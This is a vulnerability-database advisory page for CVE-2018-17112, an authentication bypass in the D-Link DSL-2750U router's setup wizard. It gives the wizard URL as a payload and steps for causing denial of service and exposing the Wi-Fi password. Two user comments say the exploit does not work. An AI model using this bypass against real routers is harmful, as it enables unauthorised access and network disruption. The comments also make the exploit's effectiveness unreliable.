D-Link DSL-2750U Setup Wizard Page Authentication Bypass

2018-08-28 / 2018-09-17

Credit: Admin_JOKER

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2018-17112

CWE: N/A

○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○	
•	       	 		 ██╗     ██╗███████╗ █████╗ ██████╗ ██████╗ 					      •
• 		  		 ██║     ██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗					      •
•	    	 		 ██║     ██║  ███╔╝ ███████║██████╔╝██║  ██║					      •
•	         		 ██║     ██║ ███╔╝  ██╔══██║██╔══██╗██║  ██║					      •
•	         		 ███████╗██║███████╗██║  ██║██║  ██║██████╔╝					      •
•	         		 ╚══════╝╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝ 					      •
•     # Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage} 	      •
•     # Exploit Author: Admin_JOKER									     	      •
•     # Email: Joker.Ktm314@gmail.com								 		      •
•     # Date: 2018-08-23										 	      •
•     # Category: Webapps											      •
•     # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/	      •
•     # Tesed on: DSL-2750U											      •
•     # Firmware Version:  1.11 / Work All Older Firmware		  		  			      •
•     # Video : https://youtu.be/BQQbp2vn_wY								       	      •
○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○

URL: http://[Router IP]/
Example URL : http://192.168.1.1

Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard
Example Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard

+-----------------------------------------------Setup Wizard Pages-----------------------------------------------------+
|Step 1: Set Time and Date  		(No matter)	 			  				       |
|Step 2: Setup Internet Connection	(Give wrong information >> Denial of Service)		     		       |
|Step 3: Configure Wireless Network	(Change Type="password" to Type="text" in html code >> Information Leakage)    |
|Step 4: Set Password			(Skip this Step )    			      				       |
|Step 5: Completed and Quit		(Finish)  			      				 	       |
+----------------------------------------------------------------------------------------------------------------------+

References:

https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/

See this note in RAW Version

Vote for this issue:

66%

34%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

3ala

| Date: 2019-04-28 17:01 CET+1

HI, this not working on my DSL-2750U firmware 1.11

after i'm done with all these steps. in the last one when i hit APPLY a message appears and says:"SET IN,.....PLEASE WAIT FOR THE PROCESS"
and a loading bar under it.

Kader1111

| Date: 2019-05-05 22:41 CET+1

this is a big lie, yes you can edit as much as you like but when you get to the end the router doesn't restart and nothing changes, even your video mister LIZARD doesn't show what happens in the end and you just blocked comment under the video so no one can say you are wrong or pretending to have an exploit while you just copied it from exploit data base. cheers

D-Link DSL-2750U Setup Wizard Page Authentication Bypass

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

D-Link DSL-2750U Setup Wizard Page Authentication Bypass

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.